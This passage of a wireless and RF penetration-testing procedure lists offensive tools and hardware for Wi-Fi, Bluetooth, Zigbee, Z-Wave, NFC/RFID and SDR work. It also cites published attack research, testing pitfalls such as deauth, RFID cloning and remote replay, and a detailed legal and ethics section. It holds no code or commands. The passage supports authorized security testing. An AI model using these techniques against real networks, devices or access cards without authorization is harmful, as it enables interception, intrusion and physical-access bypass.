KillerBee Zigbee / 802.15.4 Sniffing / injection toolkit github.com/riverloopsec/killerbee
Z3sec / Zigator Zigbee / 802.15.4 Newer 802.15.4 research framework [verify 2026-04-26] search GitHub
EZ-Wave Z-Wave SDR-based Z-Wave research [verify 2026-04-26 — repo URL has moved]
gr-lora LoRa GNU Radio LoRa-PHY decoder (rpp0) github.com/rpp0/gr-lora
ChirpStack LoRaWAN Open-source network server (lab) chirpstack.io
Proxmark3 (Iceman fork) NFC / RFID 125 kHz + 13.56 MHz universal github.com/RfidResearchGroup/proxmark3
ChameleonMini / Ultra NFC Card emulation github.com/RfidResearchGroup/ChameleonUltra
Flipper Zero Multi (sub-GHz / NFC / IR / BLE / 125 kHz) Consumer-grade tool flipperzero.one
libnfc + mfoc / mfcuk NFC MIFARE Classic key recovery github.com/nfc-tools/libnfc
GNU Radio + GRC SDR Visual signal-processing flowgraph gnuradio.org
GQRX SDR Spectrum analyzer + demod (RX) gqrx.dk
SDR++ SDR Modern spectrum tool sdrpp.org
Inspectrum SDR Visual cfile inspector github.com/miek/inspectrum
Universal Radio Hacker (URH) SDR / sub-GHz Point-and-click protocol RE github.com/jopohl/urh
rtl_433 Sub-GHz Known-protocol decoder github.com/merbanan/rtl_433
RfCat Sub-GHz Yard Stick One TX/RX research github.com/atlas0fd00m/rfcat
Wireshark All PCAP inspection (802.11, 802.15.4, BLE, LoRaWAN, Z-Wave dissectors) wireshark.org

Recommended Hardware

Hardware Use Notes
Alfa AWUS036ACH / AWUS036ACS / AWUS036ACM Wi-Fi monitor + injection RTL8812AU / MT7610U / MT7612U chipsets — verify current driver state per kernel [verify 2026-04-26]
ASUS USB-AC68 Wi-Fi 5 USB Linux driver community-maintained
Panda PAU09 2.4/5 GHz USB Older RT5572 chipset, well-supported
nRF52840 dongle (Nordic) BLE / Thread / Zigbee Multi-protocol; cheap
TI CC2531 USB stick Zigbee / 802.15.4 KillerBee-supported
Silicon Labs EFR32MG24 dev kit Zigbee / Thread / Matter Vendor reference
Proxmark3 Easy / RDV4 NFC / RFID RDV4 has more memory, swappable antennas
Flipper Zero Multi Consumer tool; check regional TX restrictions
RTL-SDR Blog v3 Generalist RX SDR Cheapest entry
HackRF One TX/RX SDR 1 MHz - 6 GHz, half-duplex
LimeSDR Mini 2.0 / BladeRF 2.0 / USRP B210 Full-duplex SDR For relay attacks, repeaters, full-duplex GNU Radio flowgraphs
Yard Stick One Sub-GHz TX/RX (RfCat) Good for replay/bruteforce of 300/433/868/915 MHz remotes

Reference Resources

Comprehensive Knowledge Bases

Attack Research Deep Dives

  • Dragonblood (Vanhoef & Ronen, 2019)wpa3.mathyvanhoef.com — WPA3 SAE side-channel and downgrade analysis
  • KRACK (Vanhoef & Piessens, 2017)krackattacks.com — 4-way handshake reinstall attack
  • FragAttacks (Vanhoef, 2021)fragattacks.com — 802.11 frame-aggregation/fragmentation flaws
  • PMKID attack (Steube, 2018) — Hashcat forum announcement; foundational for hcxdumptool workflow
  • KNOB / BIAS / BLURtooth / BLESA — Bluetooth core attacks; track CVE references in NVD
  • BrakTooth / SweynTooth — vendor-stack BLE/BR-EDR fuzzing (Singapore U Tech & Design)
  • Z-Shave / EZ-Wave (Wright et al., 2017) — DEF CON 25 talk + tooling [verify 2026-04-26]
  • Practical Wireless Hacking (KeyZ Hu, 2020) — Z-Wave + Zigbee CTFs / write-ups [verify 2026-04-26]

Defense & Hardening

  • Cisco WPA3 Deployment Guidecisco.com — search for current WPA3 deployment guide [verify 2026-04-26]
  • NSA Cybersecurity Information Sheets — Wirelessnsa.gov/cybersecurity-guidance [verify 2026-04-26]
  • NIST SP 800-153 — Guidelines for Securing Wireless LANs (note: legacy doc, last updated 2012; check for successor [verify 2026-04-26])
  • NIST SP 800-121 Rev. 2 — Guide to Bluetooth Security
  • CIS Wireless Benchmarkscisecurity.org/cis-benchmarks (search "wireless")
  • IoT Security Foundationiotsecurityfoundation.org

Hands-On Practice

  • Offensive Security PEN-210 (Wireless Attacks)offsec.com [verify 2026-04-26]
  • SANS SEC617 (Wireless Penetration Testing and Ethical Hacking)sans.org [verify 2026-04-26]
  • HackTheBox / TryHackMe wireless rooms — search current catalog
  • Trommell-Z3 / Practical IoT Hacking labstheiotlearninginitiative.com [verify 2026-04-26]

Common Pitfalls

  • ❌ Transmitting on any band without explicit authorization or a Faraday-cage test environment
  • ❌ Skipping PMF / WPA3 capability check — running deauth attacks against PMF-enforced clients fails silently and tips off the SOC
  • ❌ Treating WPS lock-state as definitive — some APs report locked but still respond to PIN attempts
  • ❌ Recording SDR baseband at insufficient sample rate (Nyquist violation; signal cut off; demodulation fails downstream)
  • ❌ Mixing real customer evidence with operator's own RF traffic (always operate from a dedicated lab interface, sacrificial MACs, separate antennas)
  • ❌ Using consumer Bluetooth dongles for sniffing (visibility limited to host-side HCI; LL/PHY observation needs dedicated sniffer hardware)
  • ❌ Trusting marketing on stack patch-state (firmware-RE the actual stack to confirm KNOB / BIAS / BLURtooth fix presence)
  • ❌ Cloning RFID cards beyond the engagement scope (one card per door, per scope item, with serial number recorded; do not duplicate "for convenience")
  • ❌ Forgetting that Flipper Zero sub-GHz TX is restricted in some carrier/region firmware builds — confirm device compliance per engagement region
  • ❌ Leaving evidence (handshake captures, key files, baseband recordings) on the test laptop after engagement close
  • ❌ Treating LoRa raw point-to-point as automatically authenticated (it isn't; LoRaWAN MAC is the authentication layer)
  • ❌ Neglecting the regulatory paper trail — even RX-only logging in some jurisdictions (UK Wireless Telegraphy Act 2006, partly) requires that captures of certain communications be neither published nor disclosed

Legal & Ethical Considerations

Wireless/RF testing transmits into shared spectrum. The canonical legal framework is in [[sop-legal-ethics|Legal & Ethics]]; this section names only the wireless-specific exposures.

  • FCC Part 15 / regional equivalents are binding even when the customer authorizes the test. Authorized doesn't mean licensed; transmitting outside Part 15 unlicensed-band rules requires a license. Out-of-band TX, even by accident (harmonics, intermodulation), is enforceable.
  • UK Wireless Telegraphy Act 2006 restricts disclosure of certain intercepted communications even when capture is incidental. Treat any captured payload from third-party devices as potentially regulated; do not redistribute.
  • EU Cybercrime Directive 2013/40/EU + national implementations (FR LCEN, DE §202c StGB / "Hackerparagraph", IT Codice Penale 615-quater) treat unauthorized interception and key recovery as offenses regardless of intent. Written authorization for the spectrum + the targets is necessary, not optional.
  • CFAA (US) has been applied to wireless attacks (deauth + capture used to enable downstream unauthorized network access). The wireless-only step plus the network-access step together form the offense.
  • Jamming is criminal in nearly every jurisdiction. Even narrow-band, even short-duration, even "just to test response" — FCC Section 333 (US) prohibits willful interference. RoE that mentions jamming must be vetted by counsel before any TX.
  • Spectrum used by emergency services, aviation, maritime, public safety, GPS — never transmit. Out-of-scope by default.
  • Cross-border hardware shipping for HackRF / LimeSDR / BladeRF / USRP may trigger ECCN export controls; check before shipping internationally [verify 2026-04-26].
  • Bystander privacy. Wi-Fi probe-request and BLE advertising captures contain MAC addresses (or randomized identifiers) of devices belonging to people who have not consented. Treat probe/adv data as personal data under GDPR Art. 6/9 where applicable; minimize collection, hash MACs that don't matter to the finding, and destroy at engagement end.
  • DMCA §1201 intersects when wireless testing recovers keys baked into firmware (cross-link [[sop-firmware-reverse-engineering|Firmware RE]]); the security-research exemption (Library of Congress triennial cycle) applies but is narrower than commonly believed.

OPSEC framing (operator handle, sacrificial gear, MAC randomization, IOC defang) lives in [[sop-opsec-plan|OPSEC]].

Related SOPs

Engagement governance:

  • [[sop-legal-ethics|Legal & Ethics]] - Canonical CFAA / CMA / Cybercrime Directive / DMCA framework + regulatory radio-emission rules
  • [[sop-opsec-plan|OPSEC Plan]] - MAC randomization, sacrificial gear, IOC defang, operator infrastructure
  • [[sop-collection-log|Collection Log]] - Chain-of-custody for PCAP / HCI / SDR baseband artifacts
  • [[sop-reporting-packaging-disclosure|Reporting & Disclosure]] - Out-of-band hand-off of recovered keys, defanged report delivery

Pentesting & Security:

  • [[sop-firmware-reverse-engineering|Firmware Reverse Engineering]] - Radio-stack firmware RE; embedded BLE/Zigbee/LoRa SoC analysis; key extraction from flash
  • [[sop-mobile-security|Mobile Security]] - BLE / Wi-Fi attack surface as it presents on iOS / Android targets
  • [[sop-ad-pentest|Active Directory Pentesting]] - WPA2-Enterprise → AD credential capture chain
  • [[sop-cloud-pentest|Cloud Pentesting (AWS/Azure/GCP)]] - Cloud-managed Wi-Fi controllers (Aruba Central, Cisco Meraki, MS Cloud Mgmt); admin-plane review
  • [[sop-detection-evasion-testing|Detection Evasion Testing]] - Wireless IDS / WIPS coverage testing
  • [[sop-vulnerability-research|Vulnerability Research]] - Novel RF-stack vulnerabilities; fuzzing 802.11/802.15.4/BLE
  • [[sop-bug-bounty|Bug Bounty Methodology]] - Hardware/IoT bounty program scoping

Analysis:

  • [[../Analysis/sop-cryptography-analysis|Cryptography Analysis]] - WPA2 / WPA3 / Bluetooth / LoRaWAN crypto primitives
  • [[../Analysis/sop-reverse-engineering|Reverse Engineering]] - Disassembly of captured radio-stack firmware
  • [[../Analysis/sop-malware-analysis|Malware Analysis]] - IoT-resident malware acquired via wireless ingress

Version: 1.0 · Last Updated: 2026-04-26 · Review Frequency: Quarterly for Wi-Fi / Bluetooth / Matter (fast-moving spec + tool surface); semi-annual for SDR / NFC / sub-GHz fundamentals (slower-rotating)